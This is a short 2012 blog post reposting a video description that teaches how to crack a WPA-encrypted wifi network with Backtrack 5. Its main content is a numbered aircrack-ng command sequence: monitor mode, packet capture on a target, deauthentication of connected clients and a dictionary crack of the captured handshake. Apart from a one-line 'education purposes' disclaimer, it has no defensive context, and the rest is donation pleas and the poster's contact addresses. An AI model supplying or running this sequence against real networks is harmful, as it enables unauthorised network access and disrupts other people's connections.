Sunday, January 8, 2012

How to able a WPA encypted wifi Network with Backtrack 5

How to able a WPA encypted wifi Network with Backtrack 5 Tube. Duration : 5.62 Mins.


Please donate any amount of money to my paypal which is kivi12k@aol.com This is a tutorial on how to crack a WPA encrypted password. This information should only be used for education purposes. Steps: 1)airmon-ng 2)airmon-ng start wlan0 3)airodump-ng mon0 4)airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0 5)aireplay-ng -0 5 -a (bssid) mon0 6)aircrack-ng (filename)*.cap -w (dictionary location) Ifyou need any help feel free to PM me or shoot me an instant message, a donation would also be appreciated. You can instant message me at: AIM - kivi12k@aol.com WINDOWS MESSENGER - kivi12k@hotmail.com YAHOO MESSENGER - kivi12k@ymail.com

Keywords: hack, google, kivi, 12

No comments:

Post a Comment